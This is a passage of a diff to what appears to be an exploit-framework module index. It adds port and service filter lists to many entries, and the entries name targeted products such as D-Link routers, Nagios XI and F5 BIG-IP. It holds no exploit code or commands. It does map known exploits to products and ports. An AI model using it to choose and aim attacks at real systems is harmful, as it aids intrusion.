+44123,12 @@ "platform": "Android,Linux", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33316,6 +44163,12 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)" ], @@ -33361,6 +44214,12 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33395,6 +44254,18 @@ "platform": "OSX", "arch": "armle", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)" ], @@ -33426,6 +44297,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apple iOS" ], @@ -33460,6 +44337,21 @@ "platform": "BSDi", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BSDi/4.3 Bruteforce" ], @@ -33496,6 +44388,12 @@ "platform": "Unix", "arch": "tty", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Solaris 2.6 - 8 (SPARC)" ], @@ -33527,6 +44425,12 @@ "platform": "Firefox", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Native Payload" ], @@ -33560,6 +44464,13 @@ "platform": "BSD", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "Debug", @@ -33594,6 +44505,21 @@ "platform": "BSD", "arch": "x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Watchguard XCS 9.2/10.0" ], @@ -33632,6 +44558,12 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "FreeBSD x86" ], @@ -33663,6 +44595,12 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Watchguard XCS 9.2/10.0" ], @@ -33695,6 +44633,21 @@ "platform": "BSD", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NetScaler Virtual Appliance 450010" ], @@ -33730,6 +44683,14 @@ "platform": "BSD", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Bruteforce" ], @@ -33763,6 +44724,12 @@ "platform": "BSD", "arch": "x86", "rport": 49, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "FreeBSD 6.2-Release Bruteforce" ], @@ -33800,6 +44767,12 @@ "platform": "BSD", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": [ "Automatic", "FreeBSD 8.2", @@ -33842,6 +44815,12 @@ "platform": "HPUX,Unix", "arch": "cmd", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -33875,6 +44854,12 @@ "platform": "Irix,Unix", "arch": "cmd", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -33907,6 +44892,21 @@ "platform": "Linux", "arch": "x86", "rport": 10080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "eScan 5.5-2 / Linux" ], @@ -33941,6 +44941,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33979,6 +44985,13 @@ "platform": "Linux", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "Debug", @@ -34014,6 +45027,12 @@ "platform": "Linux", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "Debug", @@ -34051,6 +45070,12 @@ "platform": "Linux", "arch": "", "rport": 7787, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "UT2004 Linux Build 3120", @@ -34085,6 +45110,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34122,6 +45162,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -34159,6 +45214,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AirTies_Air5650v3TT_FW_1.0.2.0" ], @@ -34193,6 +45263,12 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -34227,6 +45303,21 @@ "platform": "Python", "arch": "python", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Alienvault USM/OSSIM <= 5.3.0" ], @@ -34261,6 +45352,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Alienvault OSSIM 4.3" ], @@ -34293,6 +45399,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Apache Continuum <= 1.4.2" ], @@ -34330,6 +45451,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 5984, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Apache CouchDB version 1.x", @@ -34364,6 +45500,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Astium 2.1" ], @@ -34399,6 +45550,21 @@ "platform": "Unix", "arch": "cmd", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AsusWRT < v3.0.0.4.384.10007" ], @@ -34434,6 +45600,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34477,6 +45658,21 @@ "platform": "Linux,Unix", "arch": "cmd, armle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix In-Memory", "Linux Dropper" @@ -34515,6 +45711,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m" ], @@ -34550,6 +45761,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Centreon Enterprise Server 2.2" ], @@ -34582,6 +45808,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -34615,6 +45856,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34648,6 +45904,21 @@ "platform": "Linux", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cisco Firepower Management Console 6.0.1 (build 1213)" ], @@ -34679,6 +45950,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34710,6 +45996,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Python" ], @@ -34745,6 +46046,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -34778,6 +46094,21 @@ "platform": "Python", "arch": "python", "rport": 3001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34815,6 +46146,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "D-Link DIR-645 1.03" ], @@ -34852,6 +46198,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34888,6 +46249,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsle Payload" ], @@ -34919,6 +46295,23 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 23, + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "telnet", + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34955,6 +46348,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -34991,6 +46399,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35024,6 +46447,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "D-Link DIR-605L 1.13" ], @@ -35059,6 +46497,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -35093,6 +46546,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35127,6 +46595,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsbe Payload", "Linux mipsel Payload" @@ -35160,6 +46643,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35194,6 +46692,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "D-Link DSP-W215 - v1.02" @@ -35232,6 +46745,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600" ], @@ -35267,6 +46795,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "D-Link DSP-W215 - v1.0", @@ -35304,6 +46847,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35339,6 +46897,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dlink DIR-818 / 822 / 823 / 850 [MIPS]", "Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]" @@ -35376,6 +46949,21 @@ "platform": "", "arch": "", "rport": 49152, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35411,6 +46999,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -35443,6 +47046,21 @@ "platform": "", "arch": "", "rport": 2375, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux x64", "Python" @@ -35477,6 +47095,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dolibarr 3.1.1 on Linux" ], @@ -35512,6 +47145,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -35546,6 +47194,21 @@ "platform": "Linux", "arch": "", "rport": 10443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -35579,6 +47242,21 @@ "platform": "Linux,Python", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Python", "Linux x86", @@ -35615,6 +47293,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ESVA_2057" ], @@ -35649,6 +47342,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "F5 BIG-IP LTM 11.x" ], @@ -35681,6 +47389,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "F5 iControl" ], @@ -35717,6 +47440,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35757,6 +47495,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35792,6 +47545,21 @@ "platform": "Linux", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Github Enterprise 2.8" ], @@ -35826,6 +47594,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Gitlist 0.4.0" ], @@ -35860,6 +47643,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Reverse Shell)", "Automatic (Bind Shell)", @@ -35905,6 +47703,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35939,6 +47752,12 @@ "platform": "Linux", "arch": "x86", "rport": 2947, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "gpsd-1.91-1.i386.rpm", @@ -35995,6 +47814,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GroundWork 6.7.0" ], @@ -36028,6 +47862,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 8088, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36059,6 +47908,21 @@ "platform": "Linux", "arch": "x86", "rport": 2381, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP System Management 7.1.1 - Linux (CentOS)", "HP System Management 6.3.0 - Linux (CentOS)" @@ -36093,6 +47957,21 @@ "platform": "Linux,Unix", "arch": "cmd, x86, x64", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix In-Memory", "Linux Dropper" @@ -36125,6 +48004,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsbe Payload" ], @@ -36162,6 +48056,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11" ], @@ -36195,6 +48104,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -36231,6 +48155,21 @@ "platform": "Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -36264,6 +48203,21 @@ "platform": "Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -36296,6 +48250,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36328,6 +48297,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36362,6 +48346,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7778, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kloxo / CentOS" ], @@ -36393,6 +48392,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "LifeSize UVC version <= 1.2.6" ], @@ -36427,6 +48441,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic", "Version 1.42.2", @@ -36468,6 +48497,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -36510,6 +48554,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsel Payload", "Linux mipsbe Payload" @@ -36546,6 +48605,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsel Payload" ], @@ -36581,6 +48655,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -36618,6 +48707,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -36652,6 +48756,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36683,6 +48802,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36718,6 +48852,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36755,6 +48904,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsel Payload", "Linux mipsbe Payload" @@ -36790,6 +48954,21 @@ "platform": "Linux", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Mutiny 5.0-1.07 Appliance (Linux)" ], @@ -36824,6 +49003,21 @@ "platform": "Linux", "arch": "armle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36856,6 +49050,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Nagios XI <= 5.2.7" ], @@ -36894,6 +49103,21 @@ "platform": "Linux", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Nagios XI 5.2.6 <= 5.4.12" ], @@ -36926,6 +49150,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36961,6 +49200,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsbe Payload" @@ -36997,6 +49251,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsbe Payload" @@ -37031,6 +49300,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR DDGN2200 Router" ], @@ -37067,6 +49351,21 @@ "platform": "Linux", "arch": "armle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], 